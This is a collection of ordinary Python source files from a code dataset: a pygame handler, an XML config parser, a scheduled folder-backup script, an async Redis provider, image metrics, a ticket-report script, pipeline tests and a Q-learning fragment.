pygame.K_ESCAPE:\n self.s_man.set_done(True)\n if event.key == pygame.K_UP and self.s_man.get_state()<4:\n self.s_man.add_state(1)\n if event.key == pygame.K_DOWN and self.s_man.get_state()>2:\n self.s_man.add_state(-1)\n if self.s_man.get_state() == 4:\n if pygame.mouse.get_pressed()[0]:\n self.drawer.move_camera((- self.last_mouse_x + pygame.mouse.get_pos()[0], - self.last_mouse_y + pygame.mouse.get_pos()[1]))\n\n self.last_mouse_x = pygame.mouse.get_pos()[0]\n self.last_mouse_y = pygame.mouse.get_pos()[1]\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":13338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534857161","text":"__author__ = 'tylerzhu'\n\nfrom lxml import etree\n\n\nclass Macro():\n def __init__(self, name, value, desc):\n self.name = name\n self.value = value\n self.desc = desc\n\n\nclass StructItem():\n def __init__(self, name, type, cname, size, count, refer):\n self.name = name\n self.type = type\n self.cname = cname\n self.size = size\n self.count = count\n self.refer = refer\n\n\nclass Struct():\n def __init__(self, name, sort_key, items, is_refered, version):\n self.name = name\n self.sort_key = sort_key\n self.items = items\n self.is_refered = is_refered\n self.version = version\n\n\nclass MetaConfig():\n def __init__(self, config):\n self.meta = {}\n self.macros = []\n self.structs = []\n #\n self.load_config(config)\n\n def get_macro_by_name(self, name):\n if name != \"\":\n for macro in self.macros:\n if macro.name == name:\n return macro\n return None\n\n def load_config(self, config):\n # 解析meta文件\n meta_file = etree.parse(config)\n meta_root = meta_file.getroot()\n\n #\n self.meta = meta_root.attrib\n for node in meta_root:\n # macro\n if node.tag == \"macro\":\n macro = Macro(\n node.attrib[\"name\"],\n node.attrib[\"value\"],\n node.attrib[\"desc\"]\n )\n self.macros.append(macro)\n elif node.tag == \"struct\":\n self.structs.append(\n self.parse_struct(node)\n )\n pass\n\n def parse_struct(self, node):\n struct_name = node.attrib[\"name\"]\n struct_version = node.attrib[\"version\"]\n struct_sortkey = None\n if \"sortkey\" in node.attrib:\n struct_sortkey = node.attrib[\"sortkey\"]\n\n struct_items = []\n for item in node:\n if item.tag != \"entry\":\n continue\n name = item.attrib[\"name\"]\n type = item.attrib[\"type\"]\n cname = item.attrib[\"cname\"]\n # 数组元素个数,如果为0表示不是数据\n count = 0\n if \"count\" in item.attrib:\n count = item.attrib[\"count\"]\n # 字符串的大小,如果为0表示不是字符串\n size = 0\n if \"size\" in item.attrib:\n size = item.attrib[\"size\"]\n refer = None\n if \"refer\" in item.attrib:\n refer = item.attrib[\"refer\"]\n\n # name, type, cname, size, count, refer\n struct_item = StructItem(\n name, type, cname, size, count, refer\n )\n struct_items.append(struct_item)\n\n # 生成结构体(name, sort_key, items, is_refered, version)\n return Struct(\n struct_name, struct_sortkey, struct_items, False, struct_version\n )\n pass","sub_path":"convert/convert/metaParser.py","file_name":"metaParser.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336183809","text":"#Import the APScheduler\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport shutil\nimport time\nimport os.path\n\nsched = BackgroundScheduler()\n\n#Append log\nwith open(\"[LOOPER]-LOG.txt\", \"a\") as f:\n f.write(\"\\r\\nThis file was appended on \" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"\\r\\n\")\n\n#This job copies the data of the server to a vault\n@sched.scheduled_job('cron', year='*', month='*', day='*', week='*', day_of_week='*', hour='*', id=\"looper-001\")\ndef looper_job():\n with open(\"[LOOPER]-LOG.txt\", \"a\") as f:\n f.write(\"--[\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][LOOPER has reinstated]\\r\\n\")\n try:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Preparing to copy]\\r\\n\")\n s = \"C:/Users/Glitc/PycharmProjects/dzs_overwatch/playground\"\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Source selected: \" + s + \"]\\r\\n\")\n d = (\"C:/Users/Glitc/PycharmProjects/dzs_overwatch/vault/[\" + time.strftime(\"%m-%Y\") + \"]/[\" + time.strftime(\"%d ~ \") + time.strftime(\"%H-%M-%S\") + \"]backup_server\")\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Destination selected: \" + d + \"]\\r\\n\")\n # Begin copy\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Begin copy...]\\r\\n\")\n shutil.copytree(s, d)\n except:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][-][COPY HAS FAILED]\\r\\n\")\n else:\n f.write(\" [\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][Copy has been succesful]\\r\\n\")\n finally:\n f.write(\"--[\" + time.strftime(\"%d/%m/%Y\") + \" - \" + time.strftime(\"%H:%M:%S\") + \"][+][LOOPER will go in a slumber]\\r\\n\\r\\n\")\n\n#Start the schedule\nsched.start()\nprint('Press Ctrl+C to exit to stop LOOPER')\n\ntry:\n # This is here to simulate application activity (which keeps the main thread alive).\n while True:\n time.sleep(2)\nexcept (KeyboardInterrupt, SystemExit):\n # Not strictly necessary if daemonic mode is enabled but should be done if possible\n sched.shutdown()","sub_path":"looper.py","file_name":"looper.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"365982716","text":"#!/usr/bin/env python3\n\"\"\" Redis async Provider.\nNotes on redis Provider\n--------------------\nThis provider implements a few subset of funcionalities from aredis, is a WIP\nTODO:\n - use jsonpath to query json-objects\n - implements lists and hash datatypes\n\"\"\"\n\nimport asyncio\nimport aredis\nimport objectpath\nimport time\nfrom typing import Callable\n\nfrom asyncdb.exceptions import *\nfrom asyncdb.providers import (\n BasePool,\n BaseProvider,\n registerProvider,\n)\nfrom asyncdb.utils import *\n\n\nclass asyncredisPool(BasePool):\n _dsn: str = \"redis://{host}:{port}/{db}\"\n _client: Callable = None\n _max_queries = 300\n _pool = None\n _connection = None\n _encoding: str = \"utf-8\"\n properties: dict = {}\n\n def __init__(self, dsn=\"\", loop=None, params={}, **kwargs):\n super(asyncredisPool, self).__init__(dsn=dsn, loop=loop, params=params)\n self._pool = None\n try:\n if params[\"encoding\"]:\n self._encoding = params[\"encoding\"]\n except KeyError:\n pass\n if \"max_queries\" in kwargs:\n self._max_queries = kwargs[\"max_queries\"]\n\n def get_loop(self):\n return self._loop\n\n # Create a redis connection pool\n async def connect(self, **kwargs):\n \"\"\"\n __init async db initialization\n \"\"\"\n self.logger.debug(\"Asyncio Redis Pool: Connecting to {}\".format(self._dsn))\n try:\n self._pool = aredis.ConnectionPool.from_url(\n self._dsn,\n connection_class=aredis.Connection,\n max_connections=self._max_queries,\n connect_timeout=self._timeout,\n decode_responses=True,\n retry_on_timeout=True,\n loop=self._loop,\n **kwargs,\n )\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Connection error to Redis: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Unable to connect to Redis: {}\".format(str(err)))\n # is connected\n if self._pool:\n try:\n # create the connection and get the properties:\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n self.properties = await self._connection.info()\n except Exception as err:\n raise ProviderError(\"Unable to connect to Redis: {}\".format(str(err)))\n self._connected = True\n self._initialized_on = time.time()\n\n async def acquire(self):\n \"\"\"\n Take a connection from the pool.\n \"\"\"\n db = None\n self._connection = None\n # Take a connection from the pool.\n try:\n if not self._pool:\n await self._pool.connect()\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ConnectionError(\n \"Redis Pool is closed o doesnt exists: {}\".format(str(err))\n )\n except Exception as err:\n raise ProviderError(\"Redis Pool Acquire Error: {}\".format(str(err)))\n return False\n if self._connection:\n db = asyncredis(connection=self._connection, pool=self)\n return db\n\n async def release(self, connection=None):\n \"\"\"\n Release a connection from the pool\n \"\"\"\n if not connection:\n conn = self._connection\n else:\n if isinstance(connection, asyncredis):\n conn = connection.engine()\n if isinstance(connection, aredis.connection.Connection):\n conn = connection\n else:\n return True\n try:\n if not conn:\n return True\n self._pool.release(conn)\n except Exception as err:\n raise ProviderError(\"Release Error: {}\".format(str(err)))\n\n async def close(self, timeout=5):\n \"\"\"\n Close Pool\n \"\"\"\n try:\n if self._connection:\n await self.release(self._connection)\n if self._pool:\n self._pool.disconnect()\n self._connected = False\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ConnectionError(\n \"Redis Pool is closed o doesnt exists: {}\".format(str(err))\n )\n except Exception as err:\n logging.exception(\"Pool Closing Error: {}\".format(str(err)))\n return False\n\n def is_closed(self):\n self._logger.debug(\"Connection closed: %s\" % (not self._connected))\n return not self._connected\n\n async def execute(self, sentence, *args, **kwargs):\n \"\"\"\n Execute a connection into the Pool\n \"\"\"\n if self._pool:\n try:\n result = await self._connection.execute_command(\n sentence, *args, **kwargs\n )\n return result\n except TypeError as err:\n raise ProviderError(\"Execute Error: {}\".format(str(err)))\n except (\n aredis.exceptions.ConnectionError,\n aredis.exceptions.RedisError,\n ) as err:\n raise ProviderError(\"Connection close Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Execute Error: {}\".format(str(err)))\n\n async def test_connection(self, key: str = \"TEST_123\", optional: str = \"\"):\n result = None\n error = None\n try:\n await self.execute(\"set\", key, optional)\n result = await self.execute(\"get\", key)\n except Exception as err:\n error = err\n finally:\n await self.execute(\"DEL\", key)\n return [result, error]\n\n\nclass asyncredis(BaseProvider):\n _provider = \"redis\"\n _syntax = \"json\"\n _pool = None\n _dsn = \"redis://{host}:{port}/{db}\"\n _connection = None\n _connected = False\n _loop = None\n _encoding = \"utf-8\"\n\n def __init__(self, dsn=\"\", connection=None, pool=None, loop=None, params={}):\n super(asyncredis, self).__init__(dsn=dsn, loop=loop, params=params)\n if pool:\n self._pool = pool\n self._loop = self._pool.get_loop()\n self._connection = connection\n try:\n if params[\"encoding\"]:\n self._encoding = params[\"encoding\"]\n except KeyError:\n pass\n\n \"\"\"\n Context magic Methods\n \"\"\"\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n asyncio.run_until_complete(self.release())\n\n async def __aenter__(self):\n await self.connection()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n # clean up anything you need to clean up\n await self.close()\n self._connection = None\n\n \"\"\"\n Properties\n \"\"\"\n\n @property\n def pool(self):\n return self._pool\n\n def loop(self):\n return self._loop\n\n @property\n def redis(self):\n return self._connection\n\n def engine(self):\n return self._connection.connection_pool._available_connections[0]\n\n # Create a redis pool\n async def connection(self, **kwargs):\n \"\"\"\n __init async redis initialization\n \"\"\"\n self.logger.info(\"AsyncRedis: Connecting to {}\".format(self._dsn))\n try:\n if self._pool:\n self._connection = aredis.StrictRedis(connection_pool=self._pool)\n else:\n self._connection = aredis.StrictRedis.from_url(\n self._dsn,\n loop=self._loop,\n encoding=self._encoding,\n connect_timeout=self._timeout,\n decode_responses=True,\n retry_on_timeout=True,\n **kwargs,\n )\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\n \"Unable to connect to Redis, connection Refused: {}\".format(str(err))\n )\n except Exception as err:\n raise ProviderError(\"Unknown Redis Error: {}\".format(str(err)))\n return False\n # is connected\n if self._connection:\n self._connected = True\n self._initialized_on = time.time()\n\n async def release(self):\n \"\"\"\n Release a connection and return into pool\n \"\"\"\n if self._pool:\n await self._pool.release(connection=self._connection)\n\n async def close(self):\n if self._connection:\n try:\n for conn in self._connection.connection_pool._available_connections:\n conn.disconnect()\n conn = None\n except Exception as err:\n logging.exception(\"Error closing Redis Connection\")\n finally:\n del self._connection\n self._connected = False\n\n async def execute(self, sentence, *args, **kwargs):\n \"\"\"execute.\n Execute a command\n \"\"\"\n try:\n result = await self._connection.execute_command(sentence, *args, **kwargs)\n return result\n except TypeError as err:\n raise ProviderError(\"Execute Error: {}\".format(str(err)))\n except (aredis.exceptions.ConnectionError, aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Connection close Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Execute Error: {}\".format(str(err)))\n\n async def prepare(self):\n pass\n\n async def test_connection(self, key: str = \"TEST_123\", optional: str = \"\"):\n result = None\n error = None\n try:\n await self.set(key, optional)\n result = await self.get(key)\n except Exception as err:\n error = err\n finally:\n await self.delete(key)\n return [result, error]\n\n def is_closed(self):\n self._logger.debug(\"Connection closed: %s\" % (not self._connected))\n return bool(not self._connected)\n\n async def ping(self, msg: str = \"\"):\n if msg:\n await self._connection.echo(msg)\n else:\n await self._connection.ping()\n\n async def query(self, key=\"\", *val):\n return await self.get(key, val)\n\n async def queryrow(self, key=\"\", *args):\n pass\n\n async def set(self, key, value):\n try:\n return await self._connection.set(key, value)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Unknown Error: {}\".format(str(err)))\n\n async def get(self, key):\n try:\n return await self._connection.get(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Unknown Error: {}\".format(str(err)))\n\n async def clear_redis(self):\n \"\"\"\n Clear a cache\n \"\"\"\n try:\n return await self._connection.flushall()\n except Exception as e:\n print(f\"Error cleaning Cache: {e!s}\")\n raise Exception(f\"Error cleaning Cache: {e!s}\")\n\n async def clear_db(self):\n \"\"\"\n Clear a cache\n \"\"\"\n try:\n return await self._connection.flushdb()\n except Exception as e:\n self._logger.error(f\"Error cleaning DB: {e!s}\")\n raise Exception(f\"Error cleaning DB: {e!s}\")\n\n async def exists(self, key) -> bool:\n if not self._connection:\n await self.connection()\n try:\n return bool(await self._connection.exists(key))\n except (aredis.exceptions.RedisError) as err:\n print(err)\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n print(err)\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def m_exists(self, *keys):\n \"\"\" Existence of multiples Keys \"\"\"\n if not self._connection:\n await self.connection()\n try:\n return await self._connection.execute_command(\"EXISTS\", *keys)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def delete(self, key, *keys):\n try:\n return await self._connection.delete(key, *keys)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Exists Unknown Error: {}\".format(str(err)))\n\n async def expire(self, key, seconds=0):\n try:\n return await self._connection.expire(key, seconds)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration Number: {}\".format(str(seconds))\n )\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def expire_at(self, key, timestamp):\n try:\n return await self._connection.expireat(key, timestamp)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration timestamp: {}\".format(str(timestamp))\n )\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def setex(self, key, value, timeout):\n \"\"\"\n setex\n Set the value and expiration of a Key\n params:\n key: key Name\n value: value of the key\n timeout: expiration time in seconds\n \"\"\"\n if not self._connection:\n await self.connection()\n if not isinstance(timeout, int):\n time = 900\n else:\n time = timeout\n try:\n await self._connection.setex(key, time, value)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration timestamp: {}\".format(str(timestamp))\n )\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis SetEx Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis SetEx Unknown Error: {}\".format(str(err)))\n\n def persist(self, key):\n \"\"\"\n persist\n Remove the expiration of a key\n \"\"\"\n try:\n return self._connection.persist(key)\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def set_key(self, key, value):\n await self.set(key, value)\n\n async def get_key(self, key):\n return await self.get(key)\n\n \"\"\"\n Hash functions\n \"\"\"\n\n async def hmget(self, key, keys, *args):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n return await self._connection.hmget(key, keys, *args)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmget Unknown Error: {}\".format(str(err)))\n\n async def hmset(self, key, mapping):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n await self._connection.hmset(key, mapping)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hgetall(self, key):\n \"\"\"\n Get all the fields and values in a hash (redis dict)\n \"\"\"\n print(key, await self._connection.hgetall(key))\n try:\n return await self._connection.hgetall(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hget(self, key, name):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n await self._connection.hget(key, name)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hget Unknown Error: {}\".format(str(err)))\n\n async def set_hash(self, key, mapping):\n await self.hmset(key, mapping)\n\n async def get_hash(self, key, *args):\n return await self.hgetall(key, *args)\n\n async def hkeys(self, key):\n \"\"\"\n Get the keys in a hash (redis dict)\n \"\"\"\n try:\n return await self._connection.hkeys(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hvals(self, key):\n \"\"\"\n Get the keys in a hash (redis dict)\n \"\"\"\n try:\n return await self._connection.hkeys(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def keys(self, key):\n return await self.hkeys(key)\n\n async def values(self, key):\n return await self.hvals(key)\n\n async def hset(self, key, field, value):\n \"\"\"\n Set the string value of a hash field (redis dict)\n \"\"\"\n try:\n await self._connection.hset(key, field, value)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hset Unknown Error: {}\".format(str(err)))\n\n async def hget(self, key, field):\n \"\"\"\n get the value of a hash field (redis dict)\n \"\"\"\n try:\n return await self._connection.hset(key, field)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hget Unknown Error: {}\".format(str(err)))\n\n async def hexists(self, key, field, value):\n \"\"\"\n Determine if hash field exists on redis dict\n \"\"\"\n try:\n await self._connection.hexists(key, field)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis hash exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis hash exists Unknown Error: {}\".format(str(err)))\n\n async def hdel(self, key, field, *fields):\n \"\"\"\n Delete one or more hash fields\n \"\"\"\n try:\n await self._connection.hdel(key, field, *fields)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hset Unknown Error: {}\".format(str(err)))\n\n\n\"\"\"\nRegistering this Provider\n\"\"\"\nregisterProvider(asyncredis)\n","sub_path":"asyncdb/providers/asyncredis.py","file_name":"asyncredis.py","file_ext":"py","file_size_in_byte":20112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562033173","text":"import torch\n\ndef psnr(mse):\n return -10 * torch.log10(mse)\n\ndef ssim(x, y, L=1, k1=0.01, k2=0.03):\n mx, my = x.mean(), y.mean()\n sx, sy = x.std(), y.std()\n vx, vy = sx ** 2, sy ** 2\n vxy = torch.sum((x - mx) * (y - my)) / (torch.numel(x) - 1)\n c1, c2 = (k1 * L) ** 2, (k2 * L) ** 2\n ssim = (2 * mx * my + c1) * (2 * vxy + c2) /(mx ** 2 + my ** 2 + c1) / (vx + vy +c2)\n return ssim","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106033945","text":"import csv\r\nimport pandas as pd\r\n \r\ndef weekly_file(df, tick_type): #Employee ticket counts\r\n emp_count = df[\"%s_Support_Name\"% tick_type].value_counts()\r\n return(emp_count)\r\n\r\ndef sla_time(df, tick_type): #SLA for current position. Checks for age of completed tickets\r\n w, x, y, z = 0, 0, 0, 0\r\n sla_len = df['%s_age'% tick_type].sort_values()\r\n for i in sla_len: #generic letters | will clean up in future\r\n if i <= 3:\r\n w+=1\r\n if i >= 4 and i <= 10:\r\n x+=1\r\n if i >=11 and i <= 20:\r\n y+=1\r\n if i >= 21:\r\n z+=1\r\n return(\"Within 3 days: {} Within 10 days: {} Within 20 days: {} Outside 21 days: {}\").format(w, x, y, z)\r\n\r\ndef closed_tickets(df, tick_type): #counts the amount of tickets closed and any duplicated tickets closed \r\n amt_clsd = df['%s_Closed_Date'% tick_type].count()\r\n dupticks = ['AP-Duplicate', ';----AP-Duplicate', 'Duplicate']\r\n selecwrds1 = df['%s_Log_Description' % tick_type].str.split(expand = True).stack()\r\n dupe_1 = selecwrds1[selecwrds1.isin(dupticks)]\r\n return(\" {} completed {} duplicates\").format(amt_clsd, sum(dupe_1.value_counts()))\r\n\r\n \r\n \r\ndf = pd.read_excel('**') #Insert file path here\r\ntick_type = input('WO or INC: ') #INC or WO based on remedy BMC SQL results\r\nweek_num = input('Report week # ')\r\n\r\n\r\nap_num = weekly_file(df, tick_type), sla_time(df, tick_type), closed_tickets(df, tick_type)\r\ncsv_file = week_num + '.csv'\r\nwith open(csv_file, 'w') as fp:\r\n ap_week = csv.writer(fp, delimiter= \",\")\r\n ap_week.writerow(ap_num)","sub_path":"excelparser.py","file_name":"excelparser.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281000732","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2020 the AAS WorldWide Telescope project\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nfrom numpy import testing as nt\nimport os.path\nimport pytest\nimport shutil\nimport sys\n\nfrom . import assert_xml_elements_equal, test_path\nfrom .. import cli\nfrom .. import pipeline\nfrom ..pipeline import astropix\n\n\nclass LocalTestAstroPixImageSource(astropix.AstroPixImageSource):\n def query_candidates(self):\n # NB all these values are wrong for the input image!!!\n item = {\n \"creator\": \"Fake Observatory\",\n \"title\": \"Test\",\n \"description\": \"An amazing image.\",\n \"object_name\": [\"NGC 253\"],\n \"resource_url\": \"http://example.com/amazingimage.jpg\",\n \"reference_url\": \"https://public.nrao.edu/gallery/astronomers-capture-first-image-of-a-black-hole/\",\n \"image_id\": \"test1\",\n \"image_credit\": \"Courtesy an amazing telescope.\",\n \"wcs_coordinate_frame\": \"ICRS\",\n \"wcs_equinox\": \"J2000\",\n \"wcs_reference_value\": [\"187.70593075\", \"12.39112325\"],\n \"wcs_reference_dimension\": [\"2166.0\", \"2129.0\"],\n \"wcs_reference_pixel\": [\"3738.9937831\", \"3032.00448074\"],\n \"wcs_scale\": [\"-5.91663506907e-14\", \"5.91663506907e-14\"],\n \"wcs_rotation\": \"0\",\n \"wcs_projection\": \"TAN\",\n \"wcs_quality\": \"Full\",\n \"wcs_notes\": \"FAKE\",\n \"publisher\": \"FAKE\",\n \"publisher_id\": \"fake\",\n \"resource_id\": \"test1\",\n \"last_updated\": \"2019-04-08T14:00:38.128143\",\n \"metadata_version\": \"1.1\",\n \"image_width\": \"7416\",\n \"image_height\": \"4320\",\n \"image_max_boundry\": \"7416\",\n \"astropix_id\": 21642\n }\n yield astropix.AstroPixCandidateInput(item)\n\n def fetch_candidate(self, unique_id, cand_data_stream, cachedir):\n shutil.copy(test_path('NGC253ALMA.jpg'), os.path.join(cachedir, 'image.jpg'))\n\n\nclass TestPipeline(object):\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n pipeline.IMAGE_SOURCE_CLASS_LOADERS['_local_test_astropix'] = lambda: LocalTestAstroPixImageSource\n\n os.makedirs(self.work_path('repo'))\n shutil.copy(test_path('toasty-pipeline-config.yaml'), self.work_path('repo'))\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_workflow(self):\n args = [\n 'pipeline', 'init',\n '--local', self.work_path('repo'),\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'refresh',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'fetch',\n '--workdir', self.work_path('work'),\n 'fake_test1', '*nomatchisok*',\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'process-todos',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'approve',\n '--workdir', self.work_path('work'),\n 'fake_test1', 'fake_test?',\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'publish',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'ignore-rejects',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n def test_args(self):\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n '--azure-conn-env', 'NOTAVARIABLE',\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n os.environ['FAKECONNSTRING'] = 'fake'\n\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n '--azure-conn-env', 'FAKECONNSTRING',\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n","sub_path":"toasty/tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522980808","text":"from gym import make\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nimport copy\nfrom collections import deque\nimport random\nfrom tqdm import trange\n\nN_STEP = 1\nGAMMA = 0.9\n\nTRANSFORM_TO_FEATURE = True\nSTATE_SPACE_SIZE = None\nRADIAN_POINTS = np.linspace(-1, 1, 5)\n\n\ndef normalize_state(state):\n # [-1.2, 0.6] [-0.07, 0.07]\n state[0] = ((state[0] + 1.2) / (1.2 + 0.6) - 0.5) * 2\n state[1] = (state[1]) / 0.07\n return state\n\n\ndef transform_state(state):\n # result = []\n # result.extend(state)\n # return np.array(result)\n global STATE_SPACE_SIZE\n\n state = normalize_state(state)\n\n if not TRANSFORM_TO_FEATURE:\n STATE_SPACE_SIZE = 2\n return state\n else:\n\n result = []\n clone = state.clone()\n clone[1] = clone[1] * 20\n result.extend(clone)\n result.extend(torch.abs(clone))\n # for x in RADIAN_POINTS:\n # for speed in RADIAN_POINTS:\n # result.append(np.exp(-(state[0] - x) ** 2 - (state[1] - speed) ** 2))\n\n STATE_SPACE_SIZE = len(result)\n torch_result = torch.tensor(result)\n return torch_result\n\n\nMODIFIED_REWARD = True\n\n\ndef modified_reward(state, new_state, reward):\n if MODIFIED_REWARD:\n return reward + 300 * (GAMMA * abs(new_state[1]) - abs(state[1])) / 0.14 / 2\n else:\n return reward\n\n\ndef to2d(state):\n if len(state.shape) == 0:\n return state.view((1, 1))\n elif len(state.shape) == 1:\n return state.view((1, -1))\n elif len(state.shape) == 2:\n return state\n else:\n raise RuntimeError(f\"Case of the state shape: {state.shape} undefined\")\n\n\nclass AQL:\n def __init__(self, state_dim, action_dim, tensor_board_writer, lr=0.001):\n self._learn_step_counter = 0\n self._tensor_board_writer = tensor_board_writer\n self._action_dim = action_dim\n self._state_dim = state_dim\n self._gamma = GAMMA ** N_STEP\n self._lr = lr\n self._weight = torch.zeros((state_dim, action_dim), dtype=torch.double, requires_grad=True)\n self._bias = torch.zeros((1, action_dim), dtype=torch.double, requires_grad=True)\n self._loss = nn.MSELoss()\n self._optim = torch.optim.Adam([self._weight, self._bias], lr=lr, weight_decay=0.1)\n\n def update(self, transition):\n self._learn_step_counter += 1\n state, action, next_state, reward, done = transition\n state, next_state, reward = map(lambda x: 